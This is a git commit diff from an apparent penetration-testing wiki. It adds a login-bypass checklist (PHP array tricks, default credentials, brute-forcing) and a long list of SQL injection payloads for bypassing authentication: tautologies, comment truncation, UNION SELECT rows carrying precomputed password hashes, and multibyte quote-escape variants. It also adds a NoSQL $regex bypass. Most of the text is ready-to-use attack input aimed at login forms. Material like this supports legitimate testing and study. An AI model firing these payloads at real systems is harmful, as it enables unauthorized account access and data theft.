GitBook: [master] 5 pages modified
This commit is contained in:
parent
f48e8ccacf
commit
fd9418521e
@ -376,6 +376,8 @@
|
||||
* [JWT Vulnerabilities \(Json Web Tokens\)](pentesting-web/hacking-jwt-json-web-tokens.md)
|
||||
* [NoSQL injection](pentesting-web/nosql-injection.md)
|
||||
* [LDAP Injection](pentesting-web/ldap-injection.md)
|
||||
* [Login Bypass](pentesting-web/login-bypass/README.md)
|
||||
* [SQL Login bypass](pentesting-web/login-bypass/sql-login-bypass.md)
|
||||
* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
|
||||
* [Open Redirect](pentesting-web/open-redirect.md)
|
||||
* [Parameter Pollution](pentesting-web/parameter-pollution.md)
|
||||
|
41
pentesting-web/login-bypass/README.md
Normal file
41
pentesting-web/login-bypass/README.md
Normal file
@ -0,0 +1,41 @@
|
||||
# Login Bypass
|
||||
|
||||
## **Bypass regular login**
|
||||
|
||||
If you find a login page, here you can find some techniques to try to bypass it:
|
||||
|
||||
* Check for **comments** inside the page \(scroll down and to the right?\)
|
||||
* Check if you can **directly access the restricted pages**
|
||||
* Check to **not send the parameters** \(do not send any or only 1\)
|
||||
* Check the **PHP comparisons error:** _user\[\]=a&pwd=b_ , _user=a&pwd\[\]=b_ , _user\[\]=a&pwd\[\]=b_
|
||||
* Check credentials:
|
||||
* [**Default credentials**](../../brute-force.md#default-credentials) ****of the technology/platform used
|
||||
* **Common combinations** \(root, admin, password, name of the tech, default user with one of these passwords\).
|
||||
* Create a dictionary using **Cewl**, **add** the **default** username and password \(if there is\) and try to brute-force it using all the words as **usernames and password**
|
||||
* **Brute-force** using a bigger **dictionary \(**[**Brute force**](../../brute-force.md#http-post-form)**\)**
|
||||
|
||||
### SQL Injection authentication bypass
|
||||
|
||||
[Here you can find several tricks to bypass the login via **SQL injections**](../sql-injection/#authentication-bypass).
|
||||
|
||||
In the following page you can find a **custom list to try to bypass login** via SQL Injections:
|
||||
|
||||
{% page-ref page="sql-login-bypass.md" %}
|
||||
|
||||
### No SQL Injection authentication bypass
|
||||
|
||||
[Here you can find several tricks to bypass the login via **No SQL Injections.**](../nosql-injection.md#basic-authentication-bypass)\*\*\*\*
|
||||
|
||||
As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
|
||||
|
||||
### XPath Injection authentication bypass
|
||||
|
||||
|
||||
|
||||
##
|
||||
|
||||
|
||||
|
||||
* [**XPath Injection**](../xpath-injection.md)
|
||||
* [**LDAP Injection**](../ldap-injection.md)
|
||||
|
779
pentesting-web/login-bypass/sql-login-bypass.md
Normal file
779
pentesting-web/login-bypass/sql-login-bypass.md
Normal file
@ -0,0 +1,779 @@
|
||||
# SQL Login bypass
|
||||
|
||||
```text
|
||||
1234
|
||||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
|
||||
==
|
||||
=
|
||||
'
|
||||
' --
|
||||
' #
|
||||
' –
|
||||
'--
|
||||
'/*
|
||||
'#
|
||||
" --
|
||||
" #
|
||||
"/*
|
||||
' and 1='1
|
||||
' and a='a
|
||||
or true
|
||||
' or ''='
|
||||
" or ""="
|
||||
1′) and '1′='1–
|
||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
|
||||
" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
|
||||
and 1=1
|
||||
and 1=1–
|
||||
' and 'one'='one
|
||||
' and 'one'='one–
|
||||
' group by password having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' group by username having 1=1--
|
||||
like '%'
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
or 0=0 –
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
' or 0=0 –
|
||||
" or 0=0 --
|
||||
" or 0=0 #
|
||||
" or 0=0 –
|
||||
%' or '0'='0
|
||||
or 1=1–
|
||||
' or 1=1--
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or '1'='1'/*
|
||||
' or '1'='1'#
|
||||
' or '1′='1
|
||||
' or 1=1
|
||||
' or 1=1 --
|
||||
' or 1=1 –
|
||||
' or 1=1;#
|
||||
' or 1=1/*
|
||||
' or 1=1#
|
||||
' or 1=1–
|
||||
') or '1'='1
|
||||
') or '1'='1--
|
||||
') or '1'='1'--
|
||||
') or '1'='1'/*
|
||||
') or '1'='1'#
|
||||
') or ('1'='1
|
||||
') or ('1'='1--
|
||||
') or ('1'='1'--
|
||||
') or ('1'='1'/*
|
||||
') or ('1'='1'#
|
||||
'or'1=1
|
||||
'or'1=1′
|
||||
" or "1"="1
|
||||
" or "1"="1"--
|
||||
" or "1"="1"/*
|
||||
" or "1"="1"#
|
||||
" or 1=1
|
||||
" or 1=1 --
|
||||
" or 1=1 –
|
||||
" or 1=1--
|
||||
" or 1=1/*
|
||||
" or 1=1#
|
||||
" or 1=1–
|
||||
") or "1"="1
|
||||
") or "1"="1"--
|
||||
") or "1"="1"/*
|
||||
") or "1"="1"#
|
||||
") or ("1"="1
|
||||
") or ("1"="1"--
|
||||
") or ("1"="1"/*
|
||||
") or ("1"="1"#
|
||||
) or '1′='1–
|
||||
) or ('1′='1–
|
||||
' or 1=1 LIMIT 1;#
|
||||
'or 1=1 or ''='
|
||||
"or 1=1 or ""="
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
' or a=a–
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
") or ("a"="a
|
||||
') or ('a'='a and hi") or ("a"="a
|
||||
' or 'one'='one
|
||||
' or 'one'='one–
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
') or ('x'='x
|
||||
' OR 'x'='x'#;
|
||||
'=' 'or' and '=' 'or'
|
||||
' UNION ALL SELECT 1, @@version;#
|
||||
' UNION ALL SELECT system_user(),user();#
|
||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||
admin' and substring(password/text(),1,1)='7
|
||||
' and substring(password/text(),1,1)='7
|
||||
"
|
||||
'-- 2
|
||||
"-- 2
|
||||
'='
|
||||
0'<'2
|
||||
"="
|
||||
0"<"2
|
||||
')
|
||||
")
|
||||
')-- 2
|
||||
')/*
|
||||
')#
|
||||
")-- 2
|
||||
") #
|
||||
")/*
|
||||
')-('
|
||||
')&('
|
||||
')^('
|
||||
')*('
|
||||
')=('
|
||||
0')<('2
|
||||
")-("
|
||||
")&("
|
||||
")^("
|
||||
")*("
|
||||
")=("
|
||||
0")<("2
|
||||
'-''-- 2
|
||||
'-''#
|
||||
'-''/*
|
||||
'&''-- 2
|
||||
'&''#
|
||||
'&''/*
|
||||
'^''-- 2
|
||||
'^''#
|
||||
'^''/*
|
||||
'*''-- 2
|
||||
'*''#
|
||||
'*''/*
|
||||
'=''-- 2
|
||||
'=''#
|
||||
'=''/*
|
||||
0'<'2'-- 2
|
||||
0'<'2'#
|
||||
0'<'2'/*
|
||||
"-""-- 2
|
||||
"-""#
|
||||
"-""/*
|
||||
"&""-- 2
|
||||
"&""#
|
||||
"&""/*
|
||||
"^""-- 2
|
||||
"^""#
|
||||
"^""/*
|
||||
"*""-- 2
|
||||
"*""#
|
||||
"*""/*
|
||||
"=""-- 2
|
||||
"=""#
|
||||
"=""/*
|
||||
0"<"2"-- 2
|
||||
0"<"2"#
|
||||
0"<"2"/*
|
||||
')-''-- 2
|
||||
')-''#
|
||||
')-''/*
|
||||
')&''-- 2
|
||||
')&''#
|
||||
')&''/*
|
||||
')^''-- 2
|
||||
')^''#
|
||||
')^''/*
|
||||
')*''-- 2
|
||||
')*''#
|
||||
')*''/*
|
||||
')=''-- 2
|
||||
')=''#
|
||||
')=''/*
|
||||
0')<'2'-- 2
|
||||
0')<'2'#
|
||||
0')<'2'/*
|
||||
")-""-- 2
|
||||
")-""#
|
||||
")-""/*
|
||||
")&""-- 2
|
||||
")&""#
|
||||
")&""/*
|
||||
")^""-- 2
|
||||
")^""#
|
||||
")^""/*
|
||||
")*""-- 2
|
||||
")*""#
|
||||
")*""/*
|
||||
")=""-- 2
|
||||
")=""#
|
||||
")=""/*
|
||||
0")<"2-- 2
|
||||
0")<"2#
|
||||
0")<"2/*
|
||||
'oR'2
|
||||
'oR'2'-- 2
|
||||
'oR'2'#
|
||||
'oR'2'/*
|
||||
'oR'2'oR'
|
||||
'oR(2)-- 2
|
||||
'oR(2)#
|
||||
'oR(2)/*
|
||||
'oR(2)oR'
|
||||
'oR 2-- 2
|
||||
'oR 2#
|
||||
'oR 2/*
|
||||
'oR 2 oR'
|
||||
'oR/**/2-- 2
|
||||
'oR/**/2#
|
||||
'oR/**/2/*
|
||||
'oR/**/2/**/oR'
|
||||
"oR"2
|
||||
"oR"2"-- 2
|
||||
"oR"2"#
|
||||
"oR"2"/*
|
||||
"oR"2"oR"
|
||||
"oR(2)-- 2
|
||||
"oR(2)#
|
||||
"oR(2)/*
|
||||
"oR(2)oR"
|
||||
"oR 2-- 2
|
||||
"oR 2#
|
||||
"oR 2/*
|
||||
"oR 2 oR"
|
||||
"oR/**/2-- 2
|
||||
"oR/**/2#
|
||||
"oR/**/2/*
|
||||
"oR/**/2/**/oR"
|
||||
'oR'2'='2
|
||||
'oR'2'='2'oR'
|
||||
'oR'2'='2'-- 2
|
||||
'oR'2'='2'#
|
||||
'oR'2'='2'/*
|
||||
'oR 2=2-- 2
|
||||
'oR 2=2#
|
||||
'oR 2=2/*
|
||||
'oR 2=2 oR'
|
||||
'oR/**/2=2-- 2
|
||||
'oR/**/2=2#
|
||||
'oR/**/2=2/*
|
||||
'oR/**/2=2/**/oR'
|
||||
'oR(2)=2-- 2
|
||||
'oR(2)=2#
|
||||
'oR(2)=2/*
|
||||
'oR(2)=(2)oR'
|
||||
'oR'2'='2' LimIT 1-- 2
|
||||
'oR'2'='2' LimIT 1#
|
||||
'oR'2'='2' LimIT 1/*
|
||||
'oR(2)=(2)LimIT(1)-- 2
|
||||
'oR(2)=(2)LimIT(1)#
|
||||
'oR(2)=(2)LimIT(1)/*
|
||||
"oR"2"="2
|
||||
"oR"2"="2"oR"
|
||||
"oR"2"="2"-- 2
|
||||
"oR"2"="2"#
|
||||
"oR"2"="2"/*
|
||||
"oR 2=2-- 2
|
||||
"oR 2=2#
|
||||
"oR 2=2/*
|
||||
"oR 2=2 oR"
|
||||
"oR/**/2=2-- 2
|
||||
"oR/**/2=2#
|
||||
"oR/**/2=2/*
|
||||
"oR/**/2=2/**/oR"
|
||||
"oR(2)=2-- 2
|
||||
"oR(2)=2#
|
||||
"oR(2)=2/*
|
||||
"oR(2)=(2)oR"
|
||||
"oR"2"="2" LimIT 1-- 2
|
||||
"oR"2"="2" LimIT 1#
|
||||
"oR"2"="2" LimIT 1/*
|
||||
"oR(2)=(2)LimIT(1)-- 2
|
||||
"oR(2)=(2)LimIT(1)#
|
||||
"oR(2)=(2)LimIT(1)/*
|
||||
'oR true-- 2
|
||||
'oR true#
|
||||
'oR true/*
|
||||
'oR true oR'
|
||||
'oR(true)-- 2
|
||||
'oR(true)#
|
||||
'oR(true)/*
|
||||
'oR(true)oR'
|
||||
'oR/**/true-- 2
|
||||
'oR/**/true#
|
||||
'oR/**/true/*
|
||||
'oR/**/true/**/oR'
|
||||
"oR true-- 2
|
||||
"oR true#
|
||||
"oR true/*
|
||||
"oR true oR"
|
||||
"oR(true)-- 2
|
||||
"oR(true)#
|
||||
"oR(true)/*
|
||||
"oR(true)oR"
|
||||
"oR/**/true-- 2
|
||||
"oR/**/true#
|
||||
"oR/**/true/*
|
||||
"oR/**/true/**/oR"
|
||||
'oR'2'LiKE'2
|
||||
'oR'2'LiKE'2'-- 2
|
||||
'oR'2'LiKE'2'#
|
||||
'oR'2'LiKE'2'/*
|
||||
'oR'2'LiKE'2'oR'
|
||||
'oR(2)LiKE(2)-- 2
|
||||
'oR(2)LiKE(2)#
|
||||
'oR(2)LiKE(2)/*
|
||||
'oR(2)LiKE(2)oR'
|
||||
"oR"2"LiKE"2
|
||||
"oR"2"LiKE"2"-- 2
|
||||
"oR"2"LiKE"2"#
|
||||
"oR"2"LiKE"2"/*
|
||||
"oR"2"LiKE"2"oR"
|
||||
"oR(2)LiKE(2)-- 2
|
||||
"oR(2)LiKE(2)#
|
||||
"oR(2)LiKE(2)/*
|
||||
"oR(2)LiKE(2)oR"
|
||||
admin
|
||||
admin'-- 2
|
||||
admin'#
|
||||
admin"-- 2
|
||||
admin"#
|
||||
ffifdyop
|
||||
' UniON SElecT 1,2-- 2
|
||||
' UniON SElecT 1,2,3-- 2
|
||||
' UniON SElecT 1,2,3,4-- 2
|
||||
' UniON SElecT 1,2,3,4,5-- 2
|
||||
' UniON SElecT 1,2#
|
||||
' UniON SElecT 1,2,3#
|
||||
' UniON SElecT 1,2,3,4#
|
||||
' UniON SElecT 1,2,3,4,5#
|
||||
'UniON(SElecT(1),2)-- 2
|
||||
'UniON(SElecT(1),2,3)-- 2
|
||||
'UniON(SElecT(1),2,3,4)-- 2
|
||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
||||
'UniON(SElecT(1),2)#
|
||||
'UniON(SElecT(1),2,3)#
|
||||
'UniON(SElecT(1),2,3,4)#
|
||||
'UniON(SElecT(1),2,3,4,5)#
|
||||
" UniON SElecT 1,2-- 2
|
||||
" UniON SElecT 1,2,3-- 2
|
||||
" UniON SElecT 1,2,3,4-- 2
|
||||
" UniON SElecT 1,2,3,4,5-- 2
|
||||
" UniON SElecT 1,2#
|
||||
" UniON SElecT 1,2,3#
|
||||
" UniON SElecT 1,2,3,4#
|
||||
" UniON SElecT 1,2,3,4,5#
|
||||
"UniON(SElecT(1),2)-- 2
|
||||
"UniON(SElecT(1),2,3)-- 2
|
||||
"UniON(SElecT(1),2,3,4)-- 2
|
||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
||||
"UniON(SElecT(1),2)#
|
||||
"UniON(SElecT(1),2,3)#
|
||||
"UniON(SElecT(1),2,3,4)#
|
||||
"UniON(SElecT(1),2,3,4,5)#
|
||||
'||'2
|
||||
'||2-- 2
|
||||
'||'2'||'
|
||||
'||2#
|
||||
'||2/*
|
||||
'||2||'
|
||||
"||"2
|
||||
"||2-- 2
|
||||
"||"2"||"
|
||||
"||2#
|
||||
"||2/*
|
||||
"||2||"
|
||||
'||'2'='2
|
||||
'||'2'='2'||'
|
||||
'||2=2-- 2
|
||||
'||2=2#
|
||||
'||2=2/*
|
||||
'||2=2||'
|
||||
"||"2"="2
|
||||
"||"2"="2"||"
|
||||
"||2=2-- 2
|
||||
"||2=2#
|
||||
"||2=2/*
|
||||
"||2=2||"
|
||||
'||2=(2)LimIT(1)-- 2
|
||||
'||2=(2)LimIT(1)#
|
||||
'||2=(2)LimIT(1)/*
|
||||
"||2=(2)LimIT(1)-- 2
|
||||
"||2=(2)LimIT(1)#
|
||||
"||2=(2)LimIT(1)/*
|
||||
'||true-- 2
|
||||
'||true#
|
||||
'||true/*
|
||||
'||true||'
|
||||
"||true-- 2
|
||||
"||true#
|
||||
"||true/*
|
||||
"||true||"
|
||||
'||'2'LiKE'2
|
||||
'||'2'LiKE'2'-- 2
|
||||
'||'2'LiKE'2'#
|
||||
'||'2'LiKE'2'/*
|
||||
'||'2'LiKE'2'||'
|
||||
'||(2)LiKE(2)-- 2
|
||||
'||(2)LiKE(2)#
|
||||
'||(2)LiKE(2)/*
|
||||
'||(2)LiKE(2)||'
|
||||
"||"2"LiKE"2
|
||||
"||"2"LiKE"2"-- 2
|
||||
"||"2"LiKE"2"#
|
||||
"||"2"LiKE"2"/*
|
||||
"||"2"LiKE"2"||"
|
||||
"||(2)LiKE(2)-- 2
|
||||
"||(2)LiKE(2)#
|
||||
"||(2)LiKE(2)/*
|
||||
"||(2)LiKE(2)||"
|
||||
')oR('2
|
||||
')oR'2'-- 2
|
||||
')oR'2'#
|
||||
')oR'2'/*
|
||||
')oR'2'oR('
|
||||
')oR(2)-- 2
|
||||
')oR(2)#
|
||||
')oR(2)/*
|
||||
')oR(2)oR('
|
||||
')oR 2-- 2
|
||||
')oR 2#
|
||||
')oR 2/*
|
||||
')oR 2 oR('
|
||||
')oR/**/2-- 2
|
||||
')oR/**/2#
|
||||
')oR/**/2/*
|
||||
')oR/**/2/**/oR('
|
||||
")oR("2
|
||||
")oR"2"-- 2
|
||||
")oR"2"#
|
||||
")oR"2"/*
|
||||
")oR"2"oR("
|
||||
")oR(2)-- 2
|
||||
")oR(2)#
|
||||
")oR(2)/*
|
||||
")oR(2)oR("
|
||||
")oR 2-- 2
|
||||
")oR 2#
|
||||
")oR 2/*
|
||||
")oR 2 oR("
|
||||
")oR/**/2-- 2
|
||||
")oR/**/2#
|
||||
")oR/**/2/*
|
||||
")oR/**/2/**/oR("
|
||||
')oR'2'=('2
|
||||
')oR'2'='2'oR('
|
||||
')oR'2'='2'-- 2
|
||||
')oR'2'='2'#
|
||||
')oR'2'='2'/*
|
||||
')oR 2=2-- 2
|
||||
')oR 2=2#
|
||||
')oR 2=2/*
|
||||
')oR 2=2 oR('
|
||||
')oR/**/2=2-- 2
|
||||
')oR/**/2=2#
|
||||
')oR/**/2=2/*
|
||||
')oR/**/2=2/**/oR('
|
||||
')oR(2)=2-- 2
|
||||
')oR(2)=2#
|
||||
')oR(2)=2/*
|
||||
')oR(2)=(2)oR('
|
||||
')oR'2'='2' LimIT 1-- 2
|
||||
')oR'2'='2' LimIT 1#
|
||||
')oR'2'='2' LimIT 1/*
|
||||
')oR(2)=(2)LimIT(1)-- 2
|
||||
')oR(2)=(2)LimIT(1)#
|
||||
')oR(2)=(2)LimIT(1)/*
|
||||
")oR"2"=("2
|
||||
")oR"2"="2"oR("
|
||||
")oR"2"="2"-- 2
|
||||
")oR"2"="2"#
|
||||
")oR"2"="2"/*
|
||||
")oR 2=2-- 2
|
||||
")oR 2=2#
|
||||
")oR 2=2/*
|
||||
")oR 2=2 oR("
|
||||
")oR/**/2=2-- 2
|
||||
")oR/**/2=2#
|
||||
")oR/**/2=2/*
|
||||
")oR/**/2=2/**/oR("
|
||||
")oR(2)=2-- 2
|
||||
")oR(2)=2#
|
||||
")oR(2)=2/*
|
||||
")oR(2)=(2)oR("
|
||||
")oR"2"="2" LimIT 1-- 2
|
||||
")oR"2"="2" LimIT 1#
|
||||
")oR"2"="2" LimIT 1/*
|
||||
")oR(2)=(2)LimIT(1)-- 2
|
||||
")oR(2)=(2)LimIT(1)#
|
||||
")oR(2)=(2)LimIT(1)/*
|
||||
')oR true-- 2
|
||||
')oR true#
|
||||
')oR true/*
|
||||
')oR true oR('
|
||||
')oR(true)-- 2
|
||||
')oR(true)#
|
||||
')oR(true)/*
|
||||
')oR(true)oR('
|
||||
')oR/**/true-- 2
|
||||
')oR/**/true#
|
||||
')oR/**/true/*
|
||||
')oR/**/true/**/oR('
|
||||
")oR true-- 2
|
||||
")oR true#
|
||||
")oR true/*
|
||||
")oR true oR("
|
||||
")oR(true)-- 2
|
||||
")oR(true)#
|
||||
")oR(true)/*
|
||||
")oR(true)oR("
|
||||
")oR/**/true-- 2
|
||||
")oR/**/true#
|
||||
")oR/**/true/*
|
||||
")oR/**/true/**/oR("
|
||||
')oR'2'LiKE('2
|
||||
')oR'2'LiKE'2'-- 2
|
||||
')oR'2'LiKE'2'#
|
||||
')oR'2'LiKE'2'/*
|
||||
')oR'2'LiKE'2'oR('
|
||||
')oR(2)LiKE(2)-- 2
|
||||
')oR(2)LiKE(2)#
|
||||
')oR(2)LiKE(2)/*
|
||||
')oR(2)LiKE(2)oR('
|
||||
")oR"2"LiKE("2
|
||||
")oR"2"LiKE"2"-- 2
|
||||
")oR"2"LiKE"2"#
|
||||
")oR"2"LiKE"2"/*
|
||||
")oR"2"LiKE"2"oR("
|
||||
")oR(2)LiKE(2)-- 2
|
||||
")oR(2)LiKE(2)#
|
||||
")oR(2)LiKE(2)/*
|
||||
")oR(2)LiKE(2)oR("
|
||||
admin')-- 2
|
||||
admin')#
|
||||
admin')/*
|
||||
admin")-- 2
|
||||
admin")#
|
||||
') UniON SElecT 1,2-- 2
|
||||
') UniON SElecT 1,2,3-- 2
|
||||
') UniON SElecT 1,2,3,4-- 2
|
||||
') UniON SElecT 1,2,3,4,5-- 2
|
||||
') UniON SElecT 1,2#
|
||||
') UniON SElecT 1,2,3#
|
||||
') UniON SElecT 1,2,3,4#
|
||||
') UniON SElecT 1,2,3,4,5#
|
||||
')UniON(SElecT(1),2)-- 2
|
||||
')UniON(SElecT(1),2,3)-- 2
|
||||
')UniON(SElecT(1),2,3,4)-- 2
|
||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
||||
')UniON(SElecT(1),2)#
|
||||
')UniON(SElecT(1),2,3)#
|
||||
')UniON(SElecT(1),2,3,4)#
|
||||
')UniON(SElecT(1),2,3,4,5)#
|
||||
") UniON SElecT 1,2-- 2
|
||||
") UniON SElecT 1,2,3-- 2
|
||||
") UniON SElecT 1,2,3,4-- 2
|
||||
") UniON SElecT 1,2,3,4,5-- 2
|
||||
") UniON SElecT 1,2#
|
||||
") UniON SElecT 1,2,3#
|
||||
") UniON SElecT 1,2,3,4#
|
||||
") UniON SElecT 1,2,3,4,5#
|
||||
")UniON(SElecT(1),2)-- 2
|
||||
")UniON(SElecT(1),2,3)-- 2
|
||||
")UniON(SElecT(1),2,3,4)-- 2
|
||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
||||
")UniON(SElecT(1),2)#
|
||||
")UniON(SElecT(1),2,3)#
|
||||
")UniON(SElecT(1),2,3,4)#
|
||||
")UniON(SElecT(1),2,3,4,5)#
|
||||
')||('2
|
||||
')||2-- 2
|
||||
')||'2'||('
|
||||
')||2#
|
||||
')||2/*
|
||||
')||2||('
|
||||
")||("2
|
||||
")||2-- 2
|
||||
")||"2"||("
|
||||
")||2#
|
||||
")||2/*
|
||||
")||2||("
|
||||
')||'2'=('2
|
||||
')||'2'='2'||('
|
||||
')||2=2-- 2
|
||||
')||2=2#
|
||||
')||2=2/*
|
||||
')||2=2||('
|
||||
")||"2"=("2
|
||||
")||"2"="2"||("
|
||||
")||2=2-- 2
|
||||
")||2=2#
|
||||
")||2=2/*
|
||||
")||2=2||("
|
||||
')||2=(2)LimIT(1)-- 2
|
||||
')||2=(2)LimIT(1)#
|
||||
')||2=(2)LimIT(1)/*
|
||||
")||2=(2)LimIT(1)-- 2
|
||||
")||2=(2)LimIT(1)#
|
||||
")||2=(2)LimIT(1)/*
|
||||
')||true-- 2
|
||||
')||true#
|
||||
')||true/*
|
||||
')||true||('
|
||||
")||true-- 2
|
||||
")||true#
|
||||
")||true/*
|
||||
")||true||("
|
||||
')||'2'LiKE('2
|
||||
')||'2'LiKE'2'-- 2
|
||||
')||'2'LiKE'2'#
|
||||
')||'2'LiKE'2'/*
|
||||
')||'2'LiKE'2'||('
|
||||
')||(2)LiKE(2)-- 2
|
||||
')||(2)LiKE(2)#
|
||||
')||(2)LiKE(2)/*
|
||||
')||(2)LiKE(2)||('
|
||||
")||"2"LiKE("2
|
||||
")||"2"LiKE"2"-- 2
|
||||
")||"2"LiKE"2"#
|
||||
")||"2"LiKE"2"/*
|
||||
")||"2"LiKE"2"||("
|
||||
")||(2)LiKE(2)-- 2
|
||||
")||(2)LiKE(2)#
|
||||
")||(2)LiKE(2)/*
|
||||
")||(2)LiKE(2)||("
|
||||
' UnION SELeCT 1,2`
|
||||
' UnION SELeCT 1,2,3`
|
||||
' UnION SELeCT 1,2,3,4`
|
||||
' UnION SELeCT 1,2,3,4,5`
|
||||
" UnION SELeCT 1,2`
|
||||
" UnION SELeCT 1,2,3`
|
||||
" UnION SELeCT 1,2,3,4`
|
||||
" UnION SELeCT 1,2,3,4,5`
|
||||
' or 1=1 limit 1 -- -+
|
||||
'="or'
|
||||
Pass1234.
|
||||
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658
|
||||
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#
|
||||
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.
|
||||
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#
|
||||
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
|
||||
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
|
||||
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.
|
||||
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#
|
||||
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658
|
||||
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#
|
||||
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.
|
||||
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#
|
||||
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61
|
||||
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#
|
||||
Pass1234." and 1=0 union select "admin",sha("Pass1234.
|
||||
Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
|
||||
%A8%27 Or 1=1-- 2
|
||||
%8C%A8%27 Or 1=1-- 2
|
||||
%bf' Or 1=1 -- 2
|
||||
%A8%27 Or 1-- 2
|
||||
%8C%A8%27 Or 1-- 2
|
||||
%bf' Or 1-- 2
|
||||
%A8%27Or(1)-- 2
|
||||
%8C%A8%27Or(1)-- 2
|
||||
%bf'Or(1)-- 2
|
||||
%A8%27||1-- 2
|
||||
%8C%A8%27||1-- 2
|
||||
%bf'||1-- 2
|
||||
%A8%27) Or 1=1-- 2
|
||||
%8C%A8%27) Or 1=1-- 2
|
||||
%bf') Or 1=1 -- 2
|
||||
%A8%27) Or 1-- 2
|
||||
%8C%A8%27) Or 1-- 2
|
||||
%bf') Or 1-- 2
|
||||
%A8%27)Or(1)-- 2
|
||||
%8C%A8%27)Or(1)-- 2
|
||||
%bf')Or(1)-- 2
|
||||
%A8%27)||1-- 2
|
||||
%8C%A8%27)||1-- 2
|
||||
%bf')||1-- 2
|
||||
```
|
||||
|
@ -26,6 +26,7 @@ username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non
|
||||
```bash
|
||||
#in URL
|
||||
username[$ne]=toto&password[$ne]=toto
|
||||
username[$regex]=.*&password[$regex]=.*
|
||||
username[$exists]=true&password[$exists]=true
|
||||
|
||||
#in JSON
|
||||
|
@ -258,19 +258,13 @@ We have already discussed all the ways to exploit a SQLinjection vulnerability.
|
||||
* [MySQL](mysql-injection/)
|
||||
* [PostgreSQL](postgresql-injection/)
|
||||
|
||||
